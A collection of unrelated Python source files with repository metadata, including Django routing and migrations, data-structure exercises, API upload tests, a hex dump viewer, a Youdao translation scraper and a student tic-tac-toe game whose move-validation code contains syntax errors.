from rest_framework.routers import SimpleRouter
from apps.metrics import views
router = SimpleRouter()
router.register('hourly', views.HourlyStatsViewSet, base_name='hour-aggregate')
router.register('daily', views.DailyStatsViewSet, base_name='day-aggregate')
urlpatterns = [
path('', views.StatsLinksView.as_view(), name='stats'),
] + router.urls
|
[
"rk@23doors.com"
] |
rk@23doors.com
|
9dce403fd0a95cf1630555d797f78315313c6029
|
c2a2e40309bb86e36ec1cd283c5aaa3149e28afd
|
/dev/_import.py
|
caad219057d7da4bd4fc66308afeedc8fa245d1a
|
[
"MIT"
] |
permissive
|
ossdev07/asn1crypto
|
5fc9f864eec3f109812050fa4ed50d1f343a6aad
|
213e4fb24f5f1a7f78c9f08862b0b8728fec1510
|
refs/heads/master
| 2020-12-03T23:33:55.056818
| 2019-12-29T06:46:19
| 2019-12-29T06:46:19
| 229,199,270
| 0
| 1
|
MIT
| 2019-12-20T05:53:29
| 2019-12-20T05:53:29
| null |
UTF-8
|
Python
| false
| false
| 3,279
|
py
|
# coding: utf-8
from __future__ import unicode_literals, division, absolute_import, print_function
import imp
import sys
import os
from . import build_root, package_name, package_root
if sys.version_info < (3,):
getcwd = os.getcwdu
else:
getcwd = os.getcwd
def _import_from(mod, path, mod_dir=None, allow_error=False):
"""
Imports a module from a specific path
:param mod:
A unicode string of the module name
:param path:
A unicode string to the directory containing the module
:param mod_dir:
If the sub directory of "path" is different than the "mod" name,
pass the sub directory as a unicode string
:param allow_error:
If an ImportError should be raised when the module can't be imported
:return:
None if not loaded, otherwise the module
"""
if mod_dir is None:
mod_dir = mod.replace('.', os.sep)
if not os.path.exists(path):
return None
if not os.path.exists(os.path.join(path, mod_dir)) \
and not os.path.exists(os.path.join(path, mod_dir + '.py')):
return None
if os.sep in mod_dir:
append, mod_dir = mod_dir.rsplit(os.sep, 1)
path = os.path.join(path, append)
try:
mod_info = imp.find_module(mod_dir, [path])
return imp.load_module(mod, *mod_info)
except ImportError:
if allow_error:
raise
return None
def _preload(require_oscrypto, print_info):
"""
Preloads asn1crypto and optionally oscrypto from a local source checkout,
or from a normal install
:param require_oscrypto:
A bool if oscrypto needs to be preloaded
:param print_info:
A bool if info about asn1crypto and oscrypto should be printed
"""
if print_info:
print('Working dir: ' + getcwd())
print('Python ' + sys.version.replace('\n', ''))
asn1crypto = None
oscrypto = None
if require_oscrypto:
# Some CI services don't use the package name for the dir
if package_name == 'oscrypto':
oscrypto_dir = package_root
else:
oscrypto_dir = os.path.join(build_root, 'oscrypto')
oscrypto_tests = None
if os.path.exists(oscrypto_dir):
oscrypto_tests = _import_from('oscrypto_tests', oscrypto_dir, 'tests')
if oscrypto_tests is None:
import oscrypto_tests
asn1crypto, oscrypto = oscrypto_tests.local_oscrypto()
else:
if package_name == 'asn1crypto':
asn1crypto_dir = package_root
else:
asn1crypto_dir = os.path.join(build_root, 'asn1crypto')
if os.path.exists(asn1crypto_dir):
asn1crypto = _import_from('asn1crypto', asn1crypto_dir)
if asn1crypto is None:
import asn1crypto
if print_info:
print(
'\nasn1crypto: %s, %s' % (
asn1crypto.__version__,
os.path.dirname(asn1crypto.__file__)
)
)
if require_oscrypto:
print(
'oscrypto: %s backend, %s, %s' % (
oscrypto.backend(),
oscrypto.__version__,
os.path.dirname(oscrypto.__file__)
)
)
|
[
"will@wbond.net"
] |
will@wbond.net
|
14b2409d1b96d2af04379ef25da43b732b845361
|
77bb6b9fd3efdad268a99c19da3b104a0914801b
|
/Binary Tree/binary_tree_to_doubly_link_list.py
|
2d0e72b857549cf35681bc53df47b26b164d521b
|
[] |
no_license
|
Akasurde/Algorithms
|
2dc72a9b5fd30b20aba9ddce61e763a6b086c628
|
b6b79f267d39e3f352ffb4c91c544bdbd042092e
|
refs/heads/master
| 2021-01-14T08:55:07.928438
| 2015-06-21T20:21:21
| 2015-06-21T20:21:21
| 65,351,103
| 0
| 1
| null | 2016-08-10T04:41:13
| 2016-08-10T04:41:13
| null |
UTF-8
|
Python
| false
| false
| 737
|
py
|
# -*- coding: UTF-8 -*-
# Convert a given Binary Tree to Doubly Linked List
import binary_tree
def convert_to_doubly_linked_list(root):
if not root:
return
if root.left:
left = convert_to_doubly_linked_list(root.left)
while left.right:
left = left.right
left.right = root
root.left = left
if root.right:
right = convert_to_doubly_linked_list(root.right)
while right.left:
right = right.left
root.right = right
right.left = root
return root
def print_list(root):
if not root:
return
while root.left:
root = root.left
head = root
while head:
print head.data
head = head.right
tree = binary_tree.construct_binary_tree()
root = convert_to_doubly_linked_list(tree.root)
print_list(root)
|
[
"charul.agrawal@pagalguy.com"
] |
charul.agrawal@pagalguy.com
|
ff09c2d5e520b2eb37116dfc90e2c1cffa1cad18
|
8039c88ee57447e6d3b973853aae8c3421ffa8e9
|
/backend/todoapp/migrations/0001_initial.py
|
57b9a5013f42dabf23f8ddf73d723da991e2d32b
|
[] |
no_license
|
mahidulmoon/djreact-ExpenceTracker
|
3553ebe2a141bf0a5b67a46ce6871d675c4ec098
|
196c73cc7f484d3ef423699c8527c8f4f8422e9f
|
refs/heads/master
| 2023-02-09T06:43:33.292205
| 2020-06-05T12:44:18
| 2020-06-05T12:44:18
| 269,003,222
| 2
| 0
| null | 2021-01-06T03:53:52
| 2020-06-03T06:04:32
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 726
|
py
|
# Generated by Django 3.0.6 on 2020-06-02 05:59
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Todoapp',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.TextField()),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"mahidulmoon@gmail.com"
] |
mahidulmoon@gmail.com
|
2c0ae8a4900e9a3dbe5fc23d17c814448e073a6d
|
eb0bb5267035c0222da0c072c5dcd85b46099904
|
/test/tw-1630.t
|
c4c0bd1e81926ba3b08e72cc170987370ae53fb3
|
[
"MIT"
] |
permissive
|
bjornreppen/task
|
6d96f578eec7b9cceeb4d728caeda87e7a446949
|
a9eac8bb715ac8f51073c080ac439bf5c09493e8
|
refs/heads/master
| 2021-05-30T07:48:39.263967
| 2015-10-21T20:50:42
| 2015-10-21T20:50:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,539
|
t
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
###############################################################################
#
# Copyright 2006 - 2015, Paul Beckingham, Federico Hernandez.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# http://www.opensource.org/licenses/mit-license.php
#
###############################################################################
import sys
import os
import unittest
# Ensure python finds the local simpletap module
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from basetest import Task, TestCase
class TestBug1630(TestCase):
def setUp(self):
"""Executed before each test in the class"""
self.t = Task()
self.t("add zero")
self.t("add one due:7d")
self.t("add two due:10d")
def test_attribute_modifier_with_duration(self):
"""Verify that 'due.before:9d' is correctly interpreted"""
code, out, err = self.t("due.before:9d list rc.verbose:nothing")
self.assertNotIn("zero", out)
self.assertIn("one", out)
self.assertNotIn("two", out)
def test_attribute_no_modifier_with_duration(self):
"""Verify that 'due:7d' is correctly interpreted"""
code, out, err = self.t("due:7d list rc.verbose:nothing")
self.assertNotIn("zero", out)
self.assertIn("one", out)
self.assertNotIn("two", out)
if __name__ == "__main__":
from simpletap import TAPTestRunner
unittest.main(testRunner=TAPTestRunner())
# vim: ai sts=4 et sw=4 ft=python
|
[
"paul@beckingham.net"
] |
paul@beckingham.net
|
3a51822baafc23044111a837cfa2333102d2ba8b
|
a869f208770692f65c265563a11333d6577b1d94
|
/callback_python.py
|
6a4dbd97f0cd0194b3e8584e457ad764ef6c765d
|
[] |
no_license
|
malep2007/python-scripts
|
8ea1c7fb78b5111348f5c4f54e084612f82647e4
|
e57c01f79447be3dcf193a427db6bbabe4a06665
|
refs/heads/master
| 2020-08-03T14:53:57.424520
| 2019-09-29T12:16:01
| 2019-09-29T12:16:01
| 211,792,498
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 297
|
py
|
def copy_and_manipulate(array, callback):
output = []
for i in array:
output.append(callback(i))
return output
def add_one(num):
num+=1 # freaking weird that python needs to evaluate this before it is returned
return num
print(copy_and_manipulate([1,2,3], add_one))
|
[
"ephraim.malinga@gmail.com"
] |
ephraim.malinga@gmail.com
|
65ed4e161dfa15a766e3541d97ca7beeebb6d745
|
1d9595555d45c9f31edc164275c392f9d4fc001a
|
/xmlutils/renderer/base.py
|
39d84cc6c8f5ddd5e1bce3a6a9d138dc13bd919a
|
[
"BSD-2-Clause"
] |
permissive
|
tokibito/python-xmlutils
|
9a0f364df3c32b15d4ae58e3ccf07fb3c9e004e0
|
f173b8ef01fb740d097d1875f205f714982b5829
|
refs/heads/master
| 2020-07-25T07:52:37.899389
| 2010-03-30T11:55:52
| 2010-03-30T11:55:52
| 208,221,406
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 145
|
py
|
class BaseRenderer(object):
def __init__(self, *args, **kwargs):
pass
def render(self, node):
raise NotImplementedError
|
[
"xxshss@yahoo.co.jp"
] |
xxshss@yahoo.co.jp
|
552877857c701781809eee505c222d299fae243a
|
3b9bf497cd29cea9c24462e0411fa8adbfa6ba60
|
/leetcode/Problems/1032--Stream-of-Characters-Hard.py
|
9ce827464f36efa080a24e21215caae9b4642bae
|
[] |
no_license
|
niteesh2268/coding-prepation
|
918823cb7f4965bec096ec476c639a06a9dd9692
|
19be0766f6b9c298fb32754f66416f79567843c1
|
refs/heads/master
| 2023-01-02T05:30:59.662890
| 2020-10-17T13:12:34
| 2020-10-17T13:12:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,023
|
py
|
class TrieNode:
def __init__(self):
self.children = defaultdict()
self.isWordEnd = False
class StreamChecker:
def __init__(self, words: List[str]):
self.root = TrieNode()
self.maxLen = 0
for word in words:
self.maxLen = max(self.maxLen ,len(word))
self.insert(word[::-1])
self.q = ''
def insert(self, word):
temp = self.root
for ch in word:
if ch not in temp.children:
temp.children[ch] = TrieNode()
temp = temp.children[ch]
temp.isWordEnd = True
def query(self, letter: str) -> bool:
self.q = (letter + self.q)[:self.maxLen]
temp = self.root
for ch in self.q:
if not temp:
return False
if ch not in temp.children:
return False
if temp.children[ch] and temp.children[ch].isWordEnd:
return True
temp = temp.children[ch]
|
[
"akualajayaprakash@gmailcom"
] |
akualajayaprakash@gmailcom
|
a883655d8a3bb0994ede721e1eb19c5f49814972
|
17856275ae788e15d3b089dd2f9f291488a0af78
|
/modules/post_details.py
|
30721d6d9358938a23693f952d8171cc9c022371
|
[] |
no_license
|
Bawya1098/OfficeCafe-Projects
|
71a603cb1e307b039ed414ebc8421e25d46811f6
|
346be83bcdee9e410e4ba6980bed49b24f70ca2c
|
refs/heads/master
| 2020-04-22T03:17:33.667193
| 2019-03-11T06:40:31
| 2019-03-11T06:40:31
| 170,081,664
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 270
|
py
|
def post_data(connection, user_data):
cursor = connection.cursor()
cursor.execute("""insert into orders(employee_id,cart_items) values(%s,%s);""",
(user_data['employee_id'], user_data['cart_items']))
connection.commit()
cursor.close()
|
[
"admin@Intern3-MacBook-Pro.local"
] |
admin@Intern3-MacBook-Pro.local
|
c6ddb80fc7ad55e16f7e31c3afd45024cca8d9a0
|
ea9e9756f6b5b7022015049d92c399ee03cfde67
|
/知吾煮/AutoTest_DL/interface/test_upload.py
|
e094f84e214ffe6d284efa82d6cc51de6ce3045b
|
[] |
no_license
|
Godlovesli/jiaojiewendang
|
724e0f01028cc5cbcc9ce5807bd057e15172eb91
|
579551eabfc83226804ccfbf8b868192614d7166
|
refs/heads/master
| 2020-04-05T03:38:41.212627
| 2018-11-07T09:31:51
| 2018-11-07T09:31:51
| 156,521,937
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,890
|
py
|
#!/usr/bin/env python
#_*_ coding:utf-8 _*_
# -*- __author__ = 'feng' -*-
from base.base import MyTest
from base.login import Login
import unittest
import json
from HTMLTestRunner import HTMLTestRunner
import urllib, urllib2
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
from cryptutil import generateNonce, generateSignature,getSessionSecurity,encryptAES,decryptAES,md5
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
class uploadTest(MyTest):
'''上传图片'''
url_path = '/file/upload'
@classmethod
def setUpClass(cls):
pass
def test_upload_success(self):
'''上传图片成功'''
r = self.publish('POST',
self.url_path,
{'filename': open(r'D:\test.jpg', 'rb')},
)
print r
js = json.loads(r)
self.assertEqual(js['state'], 1)
self.assertEqual(js['message'], u'上传成功')
def test_upload_null(self):
'''必填参数的值为空'''
r = self.publish('POST',
self.url_path,
{'filename': ''},
)
print r
js = json.loads(r)
self.assertEqual(js['state'],-4)
self.assertIn("'filename' is not present",js['message'])
def test_upload_panull(self):
'''必填参数为空'''
r = self.publish('POST',
self.url_path,
{'': open(r'D:\test.jpg', 'rb')},
)
print r
js = json.loads(r)
self.assertEqual(js['state'], -4)
self.assertIn("'filename' is not present", js['message'])
def test_upload_signerror(self):
'''sign不正确'''
self.url = self.base_url + self.url_path
self.signature = generateSignature(self.nonce, "POST", self.url)
register_openers()
data, headers = multipart_encode({'filename': open(r'D:\test.jpg', 'rb')})
request = urllib2.Request(self.url, data=data, headers=headers)
request.add_header('nonce', self.nonce)
request.add_header('signature', self.signature+'e')
request.add_header('User-Agent', 'chunmiapp')
response = urllib2.urlopen(request)
result = response.read()
print result
js = json.loads(result)
self.assertEqual(js['state'],-2)
self.assertIn('拦截请求授权出错',js['message'])
def test_upload_noncerror(self):
'''nonce不正确'''
self.url = self.base_url + self.url_path
self.signature = generateSignature(self.nonce, "POST", self.url)
register_openers()
data, headers = multipart_encode({'filename': open(r'D:\test.jpg', 'rb')})
request = urllib2.Request(self.url, data=data, headers=headers)
request.add_header('nonce', self.nonce+'e')
request.add_header('signature', self.signature)
request.add_header('User-Agent', 'chunmiapp')
response = urllib2.urlopen(request)
result = response.read()
print result
js = json.loads(result)
self.assertEqual(js['state'],-2)
self.assertIn('拦截请求授权出错',js['message'])
if __name__ == '__main__':
# unittest.main()
testunit = unittest.TestSuite()
testunit.addTest(uploadTest('test_upload_success'))
testunit.addTest(uploadTest('test_upload_null'))
testunit.addTest(uploadTest('test_upload_panull'))
testunit.addTest(uploadTest('test_upload_signerror'))
testunit.addTest(uploadTest('test_upload_noncerror'))
fp = open('./upload.html', 'wb')
runner = HTMLTestRunner(stream=fp,
title=u'上传图片接口测试报告',
description=u'用例执行情况:')
runner.run(testunit)
fp.close()
|
[
"1107095622@qq.com"
] |
1107095622@qq.com
|
9fef8d5dc64926520d73300c46c095a61f502d6b
|
9045393c9ace1cfb50b4c03efaafcf815ccce472
|
/tests/test_flow.py
|
5ea479c7f7be45454b6d21e1c7f9b4ed9adb4aaf
|
[
"MIT"
] |
permissive
|
pombredanne/single_file_module-project
|
554aa3aaa63e32eb1c5473085b968b1160eef9ec
|
243f4c9cd9e6ef04ec7e8a48a0fed9645d6933b2
|
refs/heads/master
| 2021-01-23T06:06:07.098548
| 2017-07-14T21:53:35
| 2017-07-14T21:53:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 661
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import random
import pytest
from sfm import flow
def bet_and_win(lower=1, upper=100, threshold=50):
value = random.randint(lower, upper)
if value > threshold:
return value
else:
raise Exception("%s point, You Lose!" % value)
def test_try_ntime():
# Successful case
value = flow.try_ntime(10000, bet_and_win, 1, 10, 5)
assert value > 5
# Unsuccessful case
with pytest.raises(Exception):
value = flow.try_ntime(1, bet_and_win, 1, 10000, 9999)
if __name__ == "__main__":
import os
pytest.main([os.path.basename(__file__), "--tb=native", "-s", ])
|
[
"husanhe@gmail.com"
] |
husanhe@gmail.com
|
e3863a265db5c7c39dd3f86727766c78fc33f2b4
|
d498d66fbe9bae2f86161f5c157d52c9433c6a8c
|
/mysite/mysite/urls.py
|
a577c6e46d6f5fde2d75a5260689f6c54dccb1ee
|
[] |
no_license
|
sulembutproton/promosys
|
9330176d175f29d1e86991d93570981f6cad8317
|
2f67f08e2f07ab9ae0f25d9ac67905ebb1bbbda2
|
refs/heads/master
| 2023-03-11T20:31:06.152814
| 2021-03-01T15:52:31
| 2021-03-01T15:52:31
| 343,463,484
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,291
|
py
|
"""
samples URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
import os
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls import url
from django.contrib.auth import views as auth_views
from django.views.static import serve
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
urlpatterns = [
path('admin/', admin.site.urls), # Keep
path('', include('ads.urls')), # Change to ads.urls
path('accounts/', include('django.contrib.auth.urls')), # Keep
url(r'^oauth/', include('social_django.urls', namespace='social')), # Keep
]
"""
# Sample applications
path('hello/', include('hello.urls')),
path('users/', include('users.urls')),
path('tracks/', include('tracks.urls')),
path('views/', include('views.urls')),
path('route/', include('route.urls', namespace='nsroute')),
path('tmpl/', include('tmpl.urls')),
path('gview/', include('gview.urls')),
path('session/', include('session.urls')),
path('authz/', include('authz.urls')),
path('getpost/', include('getpost.urls')),
path('form/', include('form.urls')),
path('crispy/', include('crispy.urls')),
path('myarts/', include('myarts.urls')),
path('menu/', include('menu.urls')),
path('forums/', include('forums.urls')),
path('pics/', include('pics.urls')),
path('favs/', include('favs.urls')),
path('favsql/', include('favsql.urls')),
path('rest/', include('rest.urls')),
path('autos/', include('autos.urls')),
path('usermodel/', include('usermodel.urls')),
path('chat/', include('chat.urls')),
path('util/', include('util.urls')),
path('well/', include('well.urls')),
path('tagme/', include('tagme.urls')),
"""
# Serve the static HTML
"""
urlpatterns += [
url(r'^site/(?P<path>.*)$', serve,
{'document_root': os.path.join(BASE_DIR, 'site'),
'show_indexes': True},
name='site_path'
),
]
"""
# Serve the favicon - Keep for later
urlpatterns += [
path('favicon.ico', serve, {
'path': 'favicon.ico',
'document_root': os.path.join(BASE_DIR, 'ads/static'),
}
),
]
# Switch to social login if it is configured - Keep for later
try:
from . import github_settings
social_login = 'registration/login_social.html'
urlpatterns.insert(0,
path('accounts/login/', auth_views.LoginView.as_view(template_name=social_login))
)
print('Using', social_login, 'as the login template')
except:
print('Using registration/login.html as the login template')
# References
# https://docs.djangoproject.com/en/3.0/ref/urls/#include
|
[
"sulembut@protonmail.com"
] |
sulembut@protonmail.com
|
5b3c899903378bc31aeee6e2a698d7b316d2b9ed
|
a1352de184b2a60295b90ba5472579c6dc8abb29
|
/misc/python/strucdump.py
|
a7ea13d9294eccf04d1da1d6211a77fe61beb026
|
[] |
no_license
|
gunmetalbackupgooglecode/corkami
|
2b5e99b1cfd94f716e35293e915d536e468aec75
|
1a52e71ec205f1cb7ce493789474209dd1b47911
|
refs/heads/master
| 2016-09-16T06:33:52.261541
| 2015-02-11T18:41:13
| 2015-02-11T18:41:13
| 32,167,637
| 25
| 11
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,465
|
py
|
#simple hex structure viewer
#TODO: classify!
# Ange Albertini, BSD Licence, 2011
import struct
import sys
fn = sys.argv[1]
last = -1
lastdata = []
lastrend = -1
INDENT = "\t"
COLS = 2
tags_types = [
('BOGUSTYPE', 50829),
]
TAGS = dict([(i[1], i[0]) for i in tags_types] + tags_types)
for i,j in TAGS.iteritems():
TAGS[j] = i
def ph(start, end, cmt=None, skip=None, ccb=None):
global r, last, lastrend, INDENT
if end > len(r):
end = len(r)
if cmt is None:
cmt = ""
if ccb is not None:
cmt = parseformat(r[start:end], ccb) + " " + cmt
cmt = cmt.splitlines()
rstart = (start / (16*COLS)) * (16*COLS)
rend = (end / (16*COLS) * (16*COLS)) + (10 if (end % 0x10 > 0) else 0)
heads = range(rstart, rend, (16*COLS))
if skip is None:
skip = len(heads)
elif skip == -1:
skip = 1
non_skipped = True
for line, head in enumerate(heads):
if line > skip and line < len(heads) - skip:
if non_skipped:
print INDENT + "[..]"
non_skipped = False
continue
if head==lastrend and line == 0:
print INDENT + " ",
else:
print INDENT + "%03x:" % head,
for i in range((16*COLS)):
if (head + i < start) or (head + i > end - 1):
print " ",
else:
print "%02x" % ord(r[head + i]),
print("// " + cmt[line] if line < len(cmt) else "")
last = end
lastdata = r[start:end]
lastrend = heads[-1]
fcuts = []
with open(fn, "rb") as f:
r = f.read()
def tag_cb(d):
return "0x%02x (%s)" % (d, TAGS[d])
def small_hex(d):
if 0 <= d < 10:
return "%i" % d
else:
return "0x%X" % d
def types(d):
return "%s (%s)" % (small_hex(d), {1:"Byte", 2:"Ascii", 3:"Short", 4:"Long", 5:"Rational"}[d])
def dec(d):
return "%i" % d
STRUCTURE = [["H,Tag", tag_cb], ["H,Type", types], ["I,Count", small_hex], ["I,ValOffset", small_hex]]
def parseformat(d,f):
s = []
for f in f:
type_, name = f[0].split(",")
size = struct.calcsize(type_)
val = struct.unpack(type_, d[:size])[0]
d = d[size:]
if len(f) == 1:
s.append("%s:0x%x" % (name, val))
else:
s.append("%s:%s" % (name, f[1](val)))
return ", ".join(s)
|
[
"ange.albertini@gmail.com"
] |
ange.albertini@gmail.com
|
2aa508143b15c41cf17a324f991bc0fe83031d58
|
5c2e4266abf6d2be9102d5309bf94071a1eae1db
|
/02 高级语法系列/cp 爬虫/基础/v18.py
|
478a6d18945b1ac16874c9eb6b549f405533e545
|
[] |
no_license
|
13834319675/python
|
8176d5da47136b9b3ec290eaa0b699c6b1e7a8ab
|
3e6f04670f6f01006f827794865488dd40bca380
|
refs/heads/master
| 2021-07-11T18:29:12.894401
| 2021-07-05T08:29:27
| 2021-07-05T08:29:27
| 171,112,613
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,756
|
py
|
'''
破解有道词典
V1
'''
from urllib import request, parse
def youdao():
k = input("请输入要翻译的内容:")
url = "http://fanyi.youdao.com/translate?smartresult=dict&smartresult=rule"
data = {
"i": k,
"from":"AUTO",
"to": "AUTO",
"smartresult": "dict",
"client": "fanyideskweb",
"salt": "1523100789519",
"sign": "b8a55a436686cd89873fa46514ccedbe",
"doctype": "json",
"version": "2.1",
"keyfrom": "fanyi.web",
"action":"FY_BY_REALTIME",
"typoResult": "false"
}
# 参数data需要是bytes格式
data = parse.urlencode(data).encode()
headers = {
"Accept": "application/json,text/javascript,*/*;q=0.01",
#"Accept-Encoding": "gzip,deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Connection": "keep-alive",
"Content-Length": "200",
"Content-Type": "application/x-www-form-urlencoded;charset=UTF-8",
"Cookie": "OUTFOX_SEARCH_USER_ID=-1548144101@10.168.8.76;JSESSIONID=aaaTLWzfvp5Hfg9mAhFkw;OUTFOX_SEARCH_USER_ID_NCOO=1999296830.4784973;___rl__test__cookies=1523100789517",
"Host": "fanyi.youdao.com",
"Origin": "http://fanyi.youdao.com",
"Referer": "http://fanyi.youdao.com/",
"User-Agent": "Mozilla/5.0( X11; Linux x86_64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36 X-Requested-With: XMLHttpRequest"
}
req = request.Request(url=url, data=data, headers=headers)
rsp = request.urlopen(req)
html = rsp.read().decode()
print(html)
if __name__ == '__main__':
youdao()
|
[
"1134876981@qq.com"
] |
1134876981@qq.com
|
62750b17337dd5468a944195eea64784f470b4ac
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/303/usersdata/284/92253/submittedfiles/testes.py
|
e388e395e0c9c5be69b317d970dd592eb7e72f48
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,020
|
py
|
linha = []
coluna = []
for linha in range (0,3,1):
for coluna in range (0,3,1):
print('%d %d' %(linha,coluna))
import random
def solicitaSimboloDoHumano():
letra = 0
while not (letra == 'O' or letra == 'X'):
print('Qual símbolo você deseja utilizar no jogo? ')
letra = input().upper()
if letra == 'X':
return ['X','O']
else:
return ['O','X']
def sorteioPrimeiraJogada():
if random.randint(1,2) == 1:
return 'Computador'
else:
return 'Jogador'
def jogadaHumana(tabuleiro):
movimento = 0
while movimento not in ( [0 0],[1 1],[2 2],[0 1],[0 2],[1 0],[1 2],[2 0],[2 1] ) .split() or not vazio(tabuleiro, int(movimento)):
print('Qual a sua jogada, []?'.format(nome))
movimento = input()
return int(movimento)
def jogadaComputador(tabuleiro, letraComputador):
if letraComputador == 'X':
letraJogador = 'O'
else:
letraJogador = 'X'
for i in range(1, 10):
copy = mostraTabuleiro(tabuleiro)
if vazio(copy, i):
movimentacao(copy, letraComputador, i)
if verificaVencedor(copy, letraComputador):
return i
for i in range(1, 10):
copy = mostraTabuleiro(tabuleiro)
if vazio(copy, i):
movimentacao(copy, letraJogador, i)
if verificaVencedor(copy, letraJogador):
return i
movimento = movAleatoria(tabuleiro, [1, 3, 7, 9])
if movimento != None:
return movimento
if vazio(tabuleiro, 5):
return 5
return movAleatoria(tabuleiro, [2, 4, 6, 8])
#def validaJogada()
def mostraTabuleiro(tabuleiro):
dupeTabuleiro = []
for i in tabuleiro:
dupeTabuleiro.append(i)
return dupeTabuleiro
def verificaVencedor(tabuleiro, letra):
return ((tabuleiro[7] == letra and tabuleiro[8] == letra and tabuleiro[9] == letra) or
(tabuleiro[4] == letra and tabuleiro[5] == letra and tabuleiro[6] == letra) or
(tabuleiro[1] == letra and tabuleiro[2] == letra and tabuleiro[3] == letra) or
(tabuleiro[7] == letra and tabuleiro[4] == letra and tabuleiro[1] == letra) or
(tabuleiro[8] == letra and tabuleiro[5] == letra and tabuleiro[2] == letra) or
(tabuleiro[9] == letra and tabuleiro[6] == letra and tabuleiro[3] == letra) or
(tabuleiro[7] == letra and tabuleiro[5] == letra and tabuleiro[3] == letra) or
(tabuleiro[9] == letra and tabuleiro[5] == letra and tabuleiro[1] == letra))
#################################################################################
def vazio(tabuleiro, movimento):
return tabuleiro[movimento] == ' '
def desenhaTabuleiro(tabuleiro):
print(' ' + tabuleiro[7] + ' | ' + tabuleiro[8] + ' | ' + tabuleiro[9])
print(' ' + tabuleiro[4] + ' | ' + tabuleiro[5] + ' | ' + tabuleiro[6])
print(' ' + tabuleiro[1] + ' | ' + tabuleiro[2] + ' | ' + tabuleiro[3])
def jogarNovamente():
print('Você deseja jogar novamente? ')
return input().lower().startswith('sim')
def movimentacao(tabuleiro, letra, movimento):
tabuleiro[movimento] = letra
def movAleatoria(tabuleiro, movimentosList):
movPossiveis = []
for i in movimentosList:
if vazio(tabuleiro, i):
movPossiveis.append(i)
if len(movPossiveis) != 0:
return random.choice(movPossiveis)
else:
return None
def completo(tabuleiro):
for i in range(1, 10):
if vazio(tabuleiro, i):
return False
return True
print('Bem vindo ao JogoDaVelha do grupo X')
nome = input('Qual o seu nome (ou apelido)? ')
while True:
tabul = [' '] * 10
letraJogador, letraComputador = solicitaSimboloDoHumano()
turn = sorteioPrimeiraJogada()
print('Vencedor do sorteio para início do jogo: {}'.format(turn))
rodando = True
while rodando:
if turn == 'Jogador':
desenhaTabuleiro(tabul)
movimento = jogadaHumana(tabul)
movimentacao(tabul, letraJogador, movimento)
if verificaVencedor(tabul, letraJogador):
desenhaTabuleiro(tabul)
print('Vencedor: {}'.format(nome))
rodando = False
else:
if completo(tabul):
desenhaTabuleiro(tabul)
print('Deu Velha!')
break
else:
turn = 'Computador'
else:
movimento = jogadaComputador(tabul, letraComputador)
movimentacao(tabul, letraComputador, movimento)
if verificaVencedor(tabul, letraComputador):
desenhaTabuleiro(tabul)
print('Vencedor: Computador')
rodando = False
else:
if completo(tabul):
desenhaTabuleiro(tabul)
print('Deu Velha!')
break
else:
turn = 'Jogador'
if not jogarNovamente():
break
|
[
"rafael.mota@ufca.edu.br"
] |
